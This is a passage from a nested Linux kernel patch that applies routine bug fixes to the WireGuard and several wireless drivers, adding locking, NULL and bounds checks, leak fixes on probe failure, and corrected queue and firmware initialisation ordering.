+--- a/drivers/net/wireguard/netlink.c
++++ b/drivers/net/wireguard/netlink.c
+@@ -546,6 +546,7 @@ static int wg_set_device(struct sk_buff *skb, struct genl_info *info)
+ 		u8 *private_key = nla_data(info->attrs[WGDEVICE_A_PRIVATE_KEY]);
+ 		u8 public_key[NOISE_PUBLIC_KEY_LEN];
+ 		struct wg_peer *peer, *temp;
++		bool send_staged_packets;
+ 
+ 		if (!crypto_memneq(wg->static_identity.static_private,
+ 				   private_key, NOISE_PUBLIC_KEY_LEN))
+@@ -564,14 +565,17 @@ static int wg_set_device(struct sk_buff *skb, struct genl_info *info)
+ 		}
+ 
+ 		down_write(&wg->static_identity.lock);
+-		wg_noise_set_static_identity_private_key(&wg->static_identity,
+-							 private_key);
+-		list_for_each_entry_safe(peer, temp, &wg->peer_list,
+-					 peer_list) {
++		send_staged_packets = !wg->static_identity.has_identity && netif_running(wg->dev);
++		wg_noise_set_static_identity_private_key(&wg->static_identity, private_key);
++		send_staged_packets = send_staged_packets && wg->static_identity.has_identity;
++
++		wg_cookie_checker_precompute_device_keys(&wg->cookie_checker);
++		list_for_each_entry_safe(peer, temp, &wg->peer_list, peer_list) {
+ 			wg_noise_precompute_static_static(peer);
+ 			wg_noise_expire_current_peer_keypairs(peer);
++			if (send_staged_packets)
++				wg_packet_send_staged_packets(peer);
+ 		}
+-		wg_cookie_checker_precompute_device_keys(&wg->cookie_checker);
+ 		up_write(&wg->static_identity.lock);
+ 	}
+ skip_set_private_key:
+diff --git a/drivers/net/wireguard/queueing.c b/drivers/net/wireguard/queueing.c
+index 8084e7408c0ae..26d235d152352 100644
+--- a/drivers/net/wireguard/queueing.c
++++ b/drivers/net/wireguard/queueing.c
+@@ -28,6 +28,7 @@ int wg_packet_queue_init(struct crypt_queue *queue, work_func_t function,
+ 	int ret;
+ 
+ 	memset(queue, 0, sizeof(*queue));
++	queue->last_cpu = -1;
+ 	ret = ptr_ring_init(&queue->ring, len, GFP_KERNEL);
+ 	if (ret)
+ 		return ret;
+diff --git a/drivers/net/wireguard/queueing.h b/drivers/net/wireguard/queueing.h
+index 583adb37ee1e3..1d4f9196bfe17 100644
+--- a/drivers/net/wireguard/queueing.h
++++ b/drivers/net/wireguard/queueing.h
+@@ -117,20 +117,17 @@ static inline int wg_cpumask_choose_online(int *stored_cpu, unsigned int id)
+ 	return cpu;
+ }
+ 
+-/* This function is racy, in the sense that next is unlocked, so it could return
+- * the same CPU twice. A race-free version of this would be to instead store an
+- * atomic sequence number, do an increment-and-return, and then iterate through
+- * every possible CPU until we get to that index -- choose_cpu. However that's
+- * a bit slower, and it doesn't seem like this potential race actually
+- * introduces any performance loss, so we live with it.
++/* This function is racy, in the sense that it's called while last_cpu is
++ * unlocked, so it could return the same CPU twice. Adding locking or using
++ * atomic sequence numbers is slower though, and the consequences of racing are
++ * harmless, so live with it.
+  */
+-static inline int wg_cpumask_next_online(int *next)
++static inline int wg_cpumask_next_online(int *last_cpu)
+ {
+-	int cpu = *next;
+-
+-	while (unlikely(!cpumask_test_cpu(cpu, cpu_online_mask)))
+-		cpu = cpumask_next(cpu, cpu_online_mask) % nr_cpumask_bits;
+-	*next = cpumask_next(cpu, cpu_online_mask) % nr_cpumask_bits;
++	int cpu = cpumask_next(*last_cpu, cpu_online_mask);
++	if (cpu >= nr_cpu_ids)
++		cpu = cpumask_first(cpu_online_mask);
++	*last_cpu = cpu;
+ 	return cpu;
+ }
+ 
+@@ -159,7 +156,7 @@ static inline void wg_prev_queue_drop_peeked(struct prev_queue *queue)
+ 
+ static inline int wg_queue_enqueue_per_device_and_peer(
+ 	struct crypt_queue *device_queue, struct prev_queue *peer_queue,
+-	struct sk_buff *skb, struct workqueue_struct *wq, int *next_cpu)
++	struct sk_buff *skb, struct workqueue_struct *wq)
+ {
+ 	int cpu;
+ 
+@@ -173,7 +170,7 @@ static inline int wg_queue_enqueue_per_device_and_peer(
+ 	/* Then we queue it up in the device queue, which consumes the
+ 	 * packet as soon as it can.
+ 	 */
+-	cpu = wg_cpumask_next_online(next_cpu);
++	cpu = wg_cpumask_next_online(&device_queue->last_cpu);
+ 	if (unlikely(ptr_ring_produce_bh(&device_queue->ring, skb)))
+ 		return -EPIPE;
+ 	queue_work_on(cpu, wq, &per_cpu_ptr(device_queue->worker, cpu)->work);
+diff --git a/drivers/net/wireguard/receive.c b/drivers/net/wireguard/receive.c
+index 7135d51d2d872..0b3f0c8435509 100644
+--- a/drivers/net/wireguard/receive.c
++++ b/drivers/net/wireguard/receive.c
+@@ -524,7 +524,7 @@ static void wg_packet_consume_data(struct wg_device *wg, struct sk_buff *skb)
+ 		goto err;
+ 
+ 	ret = wg_queue_enqueue_per_device_and_peer(&wg->decrypt_queue, &peer->rx_queue, skb,
+-						   wg->packet_crypt_wq, &wg->decrypt_queue.last_cpu);
++						   wg->packet_crypt_wq);
+ 	if (unlikely(ret == -EPIPE))
+ 		wg_queue_enqueue_per_peer_rx(skb, PACKET_STATE_DEAD);
+ 	if (likely(!ret || ret == -EPIPE)) {
+diff --git a/drivers/net/wireguard/send.c b/drivers/net/wireguard/send.c
+index 5368f7c35b4bf..95c853b59e1da 100644
+--- a/drivers/net/wireguard/send.c
++++ b/drivers/net/wireguard/send.c
+@@ -318,7 +318,7 @@ static void wg_packet_create_data(struct wg_peer *peer, struct sk_buff *first)
+ 		goto err;
+ 
+ 	ret = wg_queue_enqueue_per_device_and_peer(&wg->encrypt_queue, &peer->tx_queue, first,
+-						   wg->packet_crypt_wq, &wg->encrypt_queue.last_cpu);
++						   wg->packet_crypt_wq);
+ 	if (unlikely(ret == -EPIPE))
+ 		wg_queue_enqueue_per_peer_tx(first, PACKET_STATE_DEAD);
+ err:
+diff --git a/drivers/net/wireless/ath/ath10k/core.c b/drivers/net/wireless/ath/ath10k/core.c
+index 5eb131ab916fd..6cdb225b7eacc 100644
+--- a/drivers/net/wireless/ath/ath10k/core.c
++++ b/drivers/net/wireless/ath/ath10k/core.c
+@@ -2504,7 +2504,6 @@ EXPORT_SYMBOL(ath10k_core_napi_sync_disable);
+ static void ath10k_core_restart(struct work_struct *work)
+ {
+ 	struct ath10k *ar = container_of(work, struct ath10k, restart_work);
+-	struct ath10k_vif *arvif;
+ 	int ret;
+ 
+ 	set_bit(ATH10K_FLAG_CRASH_FLUSH, &ar->dev_flags);
+@@ -2543,14 +2542,6 @@ static void ath10k_core_restart(struct work_struct *work)
+ 		ar->state = ATH10K_STATE_RESTARTING;
+ 		ath10k_halt(ar);
+ 		ath10k_scan_finish(ar);
+-		if (ar->hw_params.hw_restart_disconnect) {
+-			list_for_each_entry(arvif, &ar->arvifs, list) {
+-				if (arvif->is_up &&
+-				    arvif->vdev_type == WMI_VDEV_TYPE_STA)
+-					ieee80211_hw_restart_disconnect(arvif->vif);
+-			}
+-		}
+-
+ 		ieee80211_restart_hw(ar->hw);
+ 		break;
+ 	case ATH10K_STATE_OFF:
+@@ -3643,6 +3634,9 @@ struct ath10k *ath10k_core_create(size_t priv_size, struct device *dev,
+ 	mutex_init(&ar->dump_mutex);
+ 	spin_lock_init(&ar->data_lock);
+ 
++	for (int ac = 0; ac < IEEE80211_NUM_ACS; ac++)
++		spin_lock_init(&ar->queue_lock[ac]);
++
+ 	INIT_LIST_HEAD(&ar->peers);
+ 	init_waitqueue_head(&ar->peer_mapping_wq);
+ 	init_waitqueue_head(&ar->htt.empty_tx_wq);
+diff --git a/drivers/net/wireless/ath/ath10k/core.h b/drivers/net/wireless/ath/ath10k/core.h
+index f5de8ce8fb456..4b5239de40184 100644
+--- a/drivers/net/wireless/ath/ath10k/core.h
++++ b/drivers/net/wireless/ath/ath10k/core.h
+@@ -1170,6 +1170,9 @@ struct ath10k {
+ 	/* protects shared structure data */
+ 	spinlock_t data_lock;
+ 
++	/* serialize wake_tx_queue calls per ac */
++	spinlock_t queue_lock[IEEE80211_NUM_ACS];
++
+ 	struct list_head arvifs;
+ 	struct list_head peers;
+ 	struct ath10k_peer *peer_map[ATH10K_MAX_NUM_PEER_IDS];
+diff --git a/drivers/net/wireless/ath/ath10k/mac.c b/drivers/net/wireless/ath/ath10k/mac.c
+index ec8d5b29bc72c..ec5c54672dfee 100644
+--- a/drivers/net/wireless/ath/ath10k/mac.c
++++ b/drivers/net/wireless/ath/ath10k/mac.c
+@@ -4732,13 +4732,14 @@ static void ath10k_mac_op_wake_tx_queue(struct ieee80211_hw *hw,
+ {
+ 	struct ath10k *ar = hw->priv;
+ 	int ret;
+-	u8 ac;
++	u8 ac = txq->ac;
+ 
+ 	ath10k_htt_tx_txq_update(hw, txq);
+ 	if (ar->htt.tx_q_state.mode != HTT_TX_MODE_SWITCH_PUSH)
+ 		return;
+ 
+-	ac = txq->ac;
++	spin_lock_bh(&ar->queue_lock[ac]);
++
+ 	ieee80211_txq_schedule_start(hw, ac);
+ 	txq = ieee80211_next_txq(hw, ac);
+ 	if (!txq)
+@@ -4753,6 +4754,7 @@ static void ath10k_mac_op_wake_tx_queue(struct ieee80211_hw *hw,
+ 	ath10k_htt_tx_txq_update(hw, txq);
+ out:
+ 	ieee80211_txq_schedule_end(hw, ac);
++	spin_unlock_bh(&ar->queue_lock[ac]);
+ }
+ 
+ /* Must not be called with conf_mutex held as workers can use that also. */
+@@ -8108,6 +8110,7 @@ static void ath10k_reconfig_complete(struct ieee80211_hw *hw,
+ 				     enum ieee80211_reconfig_type reconfig_type)
+ {
+ 	struct ath10k *ar = hw->priv;
++	struct ath10k_vif *arvif;
+ 
+ 	if (reconfig_type != IEEE80211_RECONFIG_TYPE_RESTART)
+ 		return;
+@@ -8122,6 +8125,12 @@ static void ath10k_reconfig_complete(struct ieee80211_hw *hw,
+ 		ar->state = ATH10K_STATE_ON;
+ 		ieee80211_wake_queues(ar->hw);
+ 		clear_bit(ATH10K_FLAG_RESTARTING, &ar->dev_flags);
++		if (ar->hw_params.hw_restart_disconnect) {
++			list_for_each_entry(arvif, &ar->arvifs, list) {
++				if (arvif->is_up && arvif->vdev_type == WMI_VDEV_TYPE_STA)
++					ieee80211_hw_restart_disconnect(arvif->vif);
++				}
++		}
+ 	}
+ 
+ 	mutex_unlock(&ar->conf_mutex);
+diff --git a/drivers/net/wireless/ath/ath11k/qmi.c b/drivers/net/wireless/ath/ath11k/qmi.c
+index 381c6b390dd78..01b02c03fa89c 100644
+--- a/drivers/net/wireless/ath/ath11k/qmi.c
++++ b/drivers/net/wireless/ath/ath11k/qmi.c
+@@ -2058,6 +2058,9 @@ static int ath11k_qmi_assign_target_mem_chunk(struct ath11k_base *ab)
+ 			ab->qmi.target_mem[idx].iaddr =
+ 				ioremap(ab->qmi.target_mem[idx].paddr,
+ 					ab->qmi.target_mem[i].size);
++			if (!ab->qmi.target_mem[idx].iaddr)
++				return -EIO;
++
+ 			ab->qmi.target_mem[idx].size = ab->qmi.target_mem[i].size;
+ 			host_ddr_sz = ab->qmi.target_mem[i].size;
+ 			ab->qmi.target_mem[idx].type = ab->qmi.target_mem[i].type;
+@@ -2083,6 +2086,8 @@ static int ath11k_qmi_assign_target_mem_chunk(struct ath11k_base *ab)
+ 					ab->qmi.target_mem[idx].iaddr =
+ 						ioremap(ab->qmi.target_mem[idx].paddr,
+ 							ab->qmi.target_mem[i].size);
++					if (!ab->qmi.target_mem[idx].iaddr)
++						return -EIO;
+ 				} else {
+ 					ab->qmi.target_mem[idx].paddr =
+ 						ATH11K_QMI_CALDB_ADDRESS;
+diff --git a/drivers/net/wireless/ath/ath9k/ar9003_hw.c b/drivers/net/wireless/ath/ath9k/ar9003_hw.c
+index 42f00a2a8c800..cf5648188459c 100644
+--- a/drivers/net/wireless/ath/ath9k/ar9003_hw.c
++++ b/drivers/net/wireless/ath/ath9k/ar9003_hw.c
+@@ -1099,17 +1099,22 @@ static bool ath9k_hw_verify_hang(struct ath_hw *ah, unsigned int queue)
+ {
+ 	u32 dma_dbg_chain, dma_dbg_complete;
+ 	u8 dcu_chain_state, dcu_complete_state;
++	unsigned int dbg_reg, reg_offset;
+ 	int i;
+ 
+-	for (i = 0; i < NUM_STATUS_READS; i++) {
+-		if (queue < 6)
+-			dma_dbg_chain = REG_READ(ah, AR_DMADBG_4);
+-		else
+-			dma_dbg_chain = REG_READ(ah, AR_DMADBG_5);
++	if (queue < 6) {
++		dbg_reg = AR_DMADBG_4;
++		reg_offset = queue * 5;
++	} else {
++		dbg_reg = AR_DMADBG_5;
++		reg_offset = (queue - 6) * 5;
++	}
+ 
++	for (i = 0; i < NUM_STATUS_READS; i++) {
++		dma_dbg_chain = REG_READ(ah, dbg_reg);
+ 		dma_dbg_complete = REG_READ(ah, AR_DMADBG_6);
+ 
+-		dcu_chain_state = (dma_dbg_chain >> (5 * queue)) & 0x1f;
++		dcu_chain_state = (dma_dbg_chain >> reg_offset) & 0x1f;
+ 		dcu_complete_state = dma_dbg_complete & 0x3;
+ 
+ 		if ((dcu_chain_state != 0x6) || (dcu_complete_state != 0x1))
+@@ -1128,6 +1133,7 @@ static bool ar9003_hw_detect_mac_hang(struct ath_hw *ah)
+ 	u8 dcu_chain_state, dcu_complete_state;
+ 	bool dcu_wait_frdone = false;
+ 	unsigned long chk_dcu = 0;
++	unsigned int reg_offset;
+ 	unsigned int i = 0;
+ 
+ 	dma_dbg_4 = REG_READ(ah, AR_DMADBG_4);
+@@ -1139,12 +1145,15 @@ static bool ar9003_hw_detect_mac_hang(struct ath_hw *ah)
+ 		goto exit;
+ 
+ 	for (i = 0; i < ATH9K_NUM_TX_QUEUES; i++) {
+-		if (i < 6)
++		if (i < 6) {
+ 			chk_dbg = dma_dbg_4;
+-		else
++			reg_offset = i * 5;
++		} else {
+ 			chk_dbg = dma_dbg_5;
++			reg_offset = (i - 6) * 5;
++		}
+ 
+-		dcu_chain_state = (chk_dbg >> (5 * i)) & 0x1f;
++		dcu_chain_state = (chk_dbg >> reg_offset) & 0x1f;
+ 		if (dcu_chain_state == 0x6) {
+ 			dcu_wait_frdone = true;
+ 			chk_dcu |= BIT(i);
+diff --git a/drivers/net/wireless/ath/ath9k/htc_hst.c b/drivers/net/wireless/ath/ath9k/htc_hst.c
+index fe62ff668f757..99667aba289df 100644
+--- a/drivers/net/wireless/ath/ath9k/htc_hst.c
++++ b/drivers/net/wireless/ath/ath9k/htc_hst.c
+@@ -114,7 +114,13 @@ static void htc_process_conn_rsp(struct htc_target *target,
+ 
+ 	if (svc_rspmsg->status == HTC_SERVICE_SUCCESS) {
+ 		epid = svc_rspmsg->endpoint_id;
+-		if (epid < 0 || epid >= ENDPOINT_MAX)
++
++		/* Check that the received epid for the endpoint to attach
++		 * a new service is valid. ENDPOINT0 can't be used here as it
++		 * is already reserved for HTC_CTRL_RSVD_SVC service and thus
++		 * should not be modified.
++		 */
++		if (epid <= ENDPOINT0 || epid >= ENDPOINT_MAX)
+ 			return;
+ 
+ 		service_id = be16_to_cpu(svc_rspmsg->service_id);
+diff --git a/drivers/net/wireless/ath/ath9k/main.c b/drivers/net/wireless/ath/ath9k/main.c
+index a4197c14f0a92..6360d3356e256 100644
+--- a/drivers/net/wireless/ath/ath9k/main.c
++++ b/drivers/net/wireless/ath/ath9k/main.c
+@@ -203,7 +203,7 @@ void ath_cancel_work(struct ath_softc *sc)
+ void ath_restart_work(struct ath_softc *sc)
+ {
+ 	ieee80211_queue_delayed_work(sc->hw, &sc->hw_check_work,
+-				     ATH_HW_CHECK_POLL_INT);
++				     msecs_to_jiffies(ATH_HW_CHECK_POLL_INT));
+ 
+ 	if (AR_SREV_9340(sc->sc_ah) || AR_SREV_9330(sc->sc_ah))
+ 		ieee80211_queue_delayed_work(sc->hw, &sc->hw_pll_work,
+@@ -850,7 +850,7 @@ static bool ath9k_txq_list_has_key(struct list_head *txq_list, u32 keyix)
+ static bool ath9k_txq_has_key(struct ath_softc *sc, u32 keyix)
+ {
+ 	struct ath_hw *ah = sc->sc_ah;
+-	int i;
++	int i, j;
+ 	struct ath_txq *txq;
+ 	bool key_in_use = false;
+ 
+@@ -868,8 +868,9 @@ static bool ath9k_txq_has_key(struct ath_softc *sc, u32 keyix)
+ 		if (sc->sc_ah->caps.hw_caps & ATH9K_HW_CAP_EDMA) {
+ 			int idx = txq->txq_tailidx;
+ 
+-			while (!key_in_use &&
+-			       !list_empty(&txq->txq_fifo[idx])) {
++			for (j = 0; !key_in_use &&
++			     !list_empty(&txq->txq_fifo[idx]) &&
++			     j < ATH_TXFIFO_DEPTH; j++) {
+ 				key_in_use = ath9k_txq_list_has_key(
+ 					&txq->txq_fifo[idx], keyix);
+ 				INCR(idx, ATH_TXFIFO_DEPTH);
+@@ -2239,7 +2240,7 @@ void __ath9k_flush(struct ieee80211_hw *hw, u32 queues, bool drop,
+ 	}
+ 
+ 	ieee80211_queue_delayed_work(hw, &sc->hw_check_work,
+-				     ATH_HW_CHECK_POLL_INT);
++				     msecs_to_jiffies(ATH_HW_CHECK_POLL_INT));
+ }
+ 
+ static bool ath9k_tx_frames_pending(struct ieee80211_hw *hw)
+diff --git a/drivers/net/wireless/ath/ath9k/wmi.c b/drivers/net/wireless/ath/ath9k/wmi.c
+index 19345b8f7bfd5..d652c647d56b5 100644
+--- a/drivers/net/wireless/ath/ath9k/wmi.c
++++ b/drivers/net/wireless/ath/ath9k/wmi.c
+@@ -221,6 +221,10 @@ static void ath9k_wmi_ctrl_rx(void *priv, struct sk_buff *skb,
+ 	if (unlikely(wmi->stopped))
+ 		goto free_skb;
+ 
++	/* Validate the obtained SKB. */
++	if (unlikely(skb->len < sizeof(struct wmi_cmd_hdr)))
++		goto free_skb;
++
+ 	hdr = (struct wmi_cmd_hdr *) skb->data;
+ 	cmd_id = be16_to_cpu(hdr->command_id);
+ 
+diff --git a/drivers/net/wireless/atmel/atmel_cs.c b/drivers/net/wireless/atmel/atmel_cs.c
+index 453bb84cb3386..58bba9875d366 100644
+--- a/drivers/net/wireless/atmel/atmel_cs.c
++++ b/drivers/net/wireless/atmel/atmel_cs.c
+@@ -72,6 +72,7 @@ struct local_info {
+ static int atmel_probe(struct pcmcia_device *p_dev)
+ {
+ 	struct local_info *local;
++	int ret;
+ 
+ 	dev_dbg(&p_dev->dev, "atmel_attach()\n");
+ 
+@@ -82,8 +83,16 @@ static int atmel_probe(struct pcmcia_device *p_dev)
+ 
+ 	p_dev->priv = local;
+ 
+-	return atmel_config(p_dev);
+-} /* atmel_attach */
++	ret = atmel_config(p_dev);
++	if (ret)
++		goto err_free_priv;
++
++	return 0;
++
++err_free_priv:
++	kfree(p_dev->priv);
++	return ret;
++}
+ 
+ static void atmel_detach(struct pcmcia_device *link)
+ {
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/ops.c b/drivers/net/wireless/intel/iwlwifi/mvm/ops.c
+index 994f597a7102a..864f5fb260409 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/ops.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/ops.c
+@@ -1686,8 +1686,11 @@ static void iwl_mvm_queue_state_change(struct iwl_op_mode *op_mode,
+ 		else
+ 			set_bit(IWL_MVM_TXQ_STATE_STOP_FULL, &mvmtxq->state);
+ 
+-		if (start && mvmsta->sta_state != IEEE80211_STA_NOTEXIST)
++		if (start && mvmsta->sta_state != IEEE80211_STA_NOTEXIST) {
++			local_bh_disable();
+ 			iwl_mvm_mac_itxq_xmit(mvm->hw, txq);
++			local_bh_enable();
++		}
+ 	}
+ 
+ out:
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/rxmq.c b/drivers/net/wireless/intel/iwlwifi/mvm/rxmq.c
+index 02c2a06301076..f268a31ce26d9 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/rxmq.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/rxmq.c
+@@ -296,7 +296,8 @@ static void iwl_mvm_get_signal_strength(struct iwl_mvm *mvm,
+ static int iwl_mvm_rx_mgmt_prot(struct ieee80211_sta *sta,
+ 				struct ieee80211_hdr *hdr,
+ 				struct iwl_rx_mpdu_desc *desc,
+-				u32 status)
++				u32 status,
++				struct ieee80211_rx_status *stats)
+ {
+ 	struct iwl_mvm_sta *mvmsta;
+ 	struct iwl_mvm_vif *mvmvif;
+@@ -325,8 +326,10 @@ static int iwl_mvm_rx_mgmt_prot(struct ieee80211_sta *sta,
+ 
+ 	/* good cases */
+ 	if (likely(status & IWL_RX_MPDU_STATUS_MIC_OK &&
+-		   !(status & IWL_RX_MPDU_STATUS_REPLAY_ERROR)))
++		   !(status & IWL_RX_MPDU_STATUS_REPLAY_ERROR))) {
++		stats->flag |= RX_FLAG_DECRYPTED;
+ 		return 0;
++	}
+ 
+ 	if (!sta)
+ 		return -1;
+@@ -395,7 +398,7 @@ static int iwl_mvm_rx_crypto(struct iwl_mvm *mvm, struct ieee80211_sta *sta,
+ 
+ 	if (unlikely(ieee80211_is_mgmt(hdr->frame_control) &&
+ 		     !ieee80211_has_protected(hdr->frame_control)))
+-		return iwl_mvm_rx_mgmt_prot(sta, hdr, desc, status);
++		return iwl_mvm_rx_mgmt_prot(sta, hdr, desc, status, stats);
+ 
+ 	if (!ieee80211_has_protected(hdr->frame_control) ||
+ 	    (status & IWL_RX_MPDU_STATUS_SEC_MASK) ==
+diff --git a/drivers/net/wireless/intel/iwlwifi/pcie/rx.c b/drivers/net/wireless/intel/iwlwifi/pcie/rx.c
+index 9c9f87fe83777..b455e981faa1f 100644
+--- a/drivers/net/wireless/intel/iwlwifi/pcie/rx.c
++++ b/drivers/net/wireless/intel/iwlwifi/pcie/rx.c
+@@ -1620,14 +1620,14 @@ irqreturn_t iwl_pcie_irq_rx_msix_handler(int irq, void *dev_id)
+ 	struct msix_entry *entry = dev_id;
+ 	struct iwl_trans_pcie *trans_pcie = iwl_pcie_get_trans_pcie(entry);
+ 	struct iwl_trans *trans = trans_pcie->trans;
+-	struct iwl_rxq *rxq = &trans_pcie->rxq[entry->entry];
++	struct iwl_rxq *rxq;
+ 
+ 	trace_iwlwifi_dev_irq_msix(trans->dev, entry, false, 0, 0);
+ 
+ 	if (WARN_ON(entry->entry >= trans->num_rx_queues))
+ 		return IRQ_NONE;
+ 
+-	if (!rxq) {
++	if (!trans_pcie->rxq) {
+ 		if (net_ratelimit())
+ 			IWL_ERR(trans,
+ 				"[%d] Got MSI-X interrupt before we have Rx queues\n",
+@@ -1635,6 +1635,7 @@ irqreturn_t iwl_pcie_irq_rx_msix_handler(int irq, void *dev_id)
+ 		return IRQ_NONE;
+ 	}
+ 
++	rxq = &trans_pcie->rxq[entry->entry];
+ 	lock_map_acquire(&trans->sync_cmd_lockdep_map);
+ 	IWL_DEBUG_ISR(trans, "[%d] Got interrupt\n", entry->entry);
+ 
+diff --git a/drivers/net/wireless/intersil/orinoco/orinoco_cs.c b/drivers/net/wireless/intersil/orinoco/orinoco_cs.c
+index a956f965a1e5e..03bfd2482656c 100644
+--- a/drivers/net/wireless/intersil/orinoco/orinoco_cs.c
++++ b/drivers/net/wireless/intersil/orinoco/orinoco_cs.c
+@@ -96,6 +96,7 @@ orinoco_cs_probe(struct pcmcia_device *link)
+ {
+ 	struct orinoco_private *priv;
+ 	struct orinoco_pccard *card;
++	int ret;
+ 
+ 	priv = alloc_orinocodev(sizeof(*card), &link->dev,
+ 				orinoco_cs_hard_reset, NULL);
+@@ -107,8 +108,16 @@ orinoco_cs_probe(struct pcmcia_device *link)
+ 	card->p_dev = link;
+ 	link->priv = priv;
+ 
+-	return orinoco_cs_config(link);
+-}				/* orinoco_cs_attach */
++	ret = orinoco_cs_config(link);
++	if (ret)
++		goto err_free_orinocodev;
++
++	return 0;
++
++err_free_orinocodev:
++	free_orinocodev(priv);
++	return ret;
++}
+ 
+ static void orinoco_cs_detach(struct pcmcia_device *link)
+ {
+diff --git a/drivers/net/wireless/intersil/orinoco/spectrum_cs.c b/drivers/net/wireless/intersil/orinoco/spectrum_cs.c
+index 291ef97ed45ec..841d623c621ac 100644
+--- a/drivers/net/wireless/intersil/orinoco/spectrum_cs.c
++++ b/drivers/net/wireless/intersil/orinoco/spectrum_cs.c
+@@ -157,6 +157,7 @@ spectrum_cs_probe(struct pcmcia_device *link)
+ {
+ 	struct orinoco_private *priv;
+ 	struct orinoco_pccard *card;
++	int ret;
+ 
+ 	priv = alloc_orinocodev(sizeof(*card), &link->dev,
+ 				spectrum_cs_hard_reset,
+@@ -169,8 +170,16 @@ spectrum_cs_probe(struct pcmcia_device *link)
+ 	card->p_dev = link;
+ 	link->priv = priv;
+ 
+-	return spectrum_cs_config(link);
+-}				/* spectrum_cs_attach */
++	ret = spectrum_cs_config(link);
++	if (ret)
++		goto err_free_orinocodev;
++
++	return 0;
++
++err_free_orinocodev:
++	free_orinocodev(priv);
++	return ret;
++}
+ 
+ static void spectrum_cs_detach(struct pcmcia_device *link)
+ {
+diff --git a/drivers/net/wireless/marvell/mwifiex/scan.c b/drivers/net/wireless/marvell/mwifiex/scan.c
+index ac8001c842935..644b1e134b01c 100644
+--- a/drivers/net/wireless/marvell/mwifiex/scan.c
++++ b/drivers/net/wireless/marvell/mwifiex/scan.c
+@@ -2187,9 +2187,9 @@ int mwifiex_ret_802_11_scan(struct mwifiex_private *priv,
+ 
+ 	if (nd_config) {
+ 		adapter->nd_info =
+-			kzalloc(sizeof(struct cfg80211_wowlan_nd_match) +
+-				sizeof(struct cfg80211_wowlan_nd_match *) *
+-				scan_rsp->number_of_sets, GFP_ATOMIC);
++			kzalloc(struct_size(adapter->nd_info, matches,
++					    scan_rsp->number_of_sets),
++				GFP_ATOMIC);
+ 
+ 		if (adapter->nd_info)
+ 			adapter->nd_info->n_matches = scan_rsp->number_of_sets;
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/dma.c b/drivers/net/wireless/mediatek/mt76/mt7921/dma.c
+index fd57c87a29ae3..7a305a4f292b4 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/dma.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/dma.c
+@@ -231,10 +231,6 @@ int mt7921_dma_init(struct mt7921_dev *dev)
+ 	if (ret)
+ 		return ret;
+ 
+-	ret = mt7921_wfsys_reset(dev);
+-	if (ret)
+-		return ret;
+-
+ 	/* init tx queue */
+ 	ret = mt76_connac_init_tx_queues(dev->phy.mt76, MT7921_TXQ_BAND0,
+ 					 MT7921_TX_RING_SIZE,
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/mcu.c b/drivers/net/wireless/mediatek/mt76/mt7921/mcu.c
+index d3507e86e9cf5..10dda1693d7db 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/mcu.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/mcu.c
+@@ -449,12 +449,6 @@ static int mt7921_load_firmware(struct mt7921_dev *dev)
+ {
+ 	int ret;
+ 
+-	ret = mt76_get_field(dev, MT_CONN_ON_MISC, MT_TOP_MISC2_FW_N9_RDY);
+-	if (ret && mt76_is_mmio(&dev->mt76)) {
+-		dev_dbg(dev->mt76.dev, "Firmware is already download\n");
+-		goto fw_loaded;
+-	}
+-
+ 	ret = mt76_connac2_load_patch(&dev->mt76, mt7921_patch_name(dev));
+ 	if (ret)
+ 		return ret;
+@@ -477,8 +471,6 @@ static int mt7921_load_firmware(struct mt7921_dev *dev)
+ 		return -EIO;
+ 	}
+ 
+-fw_loaded:
+-
+ #ifdef CONFIG_PM
+ 	dev->mt76.hw->wiphy->wowlan = &mt76_connac_wowlan_support;
+ #endif /* CONFIG_PM */
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/pci.c b/drivers/net/wireless/mediatek/mt76/mt7921/pci.c
+index c64b0b4e93583..b125694d6a2dc 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/pci.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/pci.c
+@@ -316,6 +316,10 @@ static int mt7921_pci_probe(struct pci_dev *pdev,
+ 	bus_ops->rmw = mt7921_rmw;
+ 	dev->mt76.bus = bus_ops;
+ 
++	ret = mt7921e_mcu_fw_pmctrl(dev);
++	if (ret)
++		goto err_free_dev;
++
+ 	ret = __mt7921e_mcu_drv_pmctrl(dev);
+ 	if (ret)
+ 		goto err_free_dev;
+@@ -324,6 +328,10 @@ static int mt7921_pci_probe(struct pci_dev *pdev,
+ 		    (mt7921_l1_rr(dev, MT_HW_REV) & 0xff);
+ 	dev_info(mdev->dev, "ASIC revision: %04x\n", mdev->rev);
+ 
++	ret = mt7921_wfsys_reset(dev);
++	if (ret)
++		goto err_free_dev;
++
+ 	mt76_wr(dev, MT_WFDMA0_HOST_INT_ENA, 0);
+ 
+ 	mt76_wr(dev, MT_PCIE_MAC_INT_ENABLE, 0xff);
+diff --git a/drivers/net/wireless/microchip/wilc1000/hif.c b/drivers/net/wireless/microchip/wilc1000/hif.c
+index 67df8221b5aeb..a1b75feec6edf 100644
+--- a/drivers/net/wireless/microchip/wilc1000/hif.c
++++ b/drivers/net/wireless/microchip/wilc1000/hif.c
+@@ -485,6 +485,9 @@ void *wilc_parse_join_bss_param(struct cfg80211_bss *bss,
+ 		int rsn_ie_len = sizeof(struct element) + rsn_ie[1];
+ 		int offset = 8;
+ 
++		param->mode_802_11i = 2;
++		param->rsn_found = true;
++
+ 		/* extract RSN capabilities */
+ 		if (offset < rsn_ie_len) {
+ 			/* skip over pairwise suites */
+@@ -494,11 +497,8 @@ void *wilc_parse_join_bss_param(struct cfg80211_bss *bss,
+ 				/* skip over authentication suites */
+ 				offset += (rsn_ie[offset] * 4) + 2;
+ 
+-				if (offset + 1 < rsn_ie_len) {
+-					param->mode_802_11i = 2;
+-					param->rsn_found = true;
++				if (offset + 1 < rsn_ie_len)
+ 					memcpy(param->rsn_cap, &rsn_ie[offset], 2);
+-				}
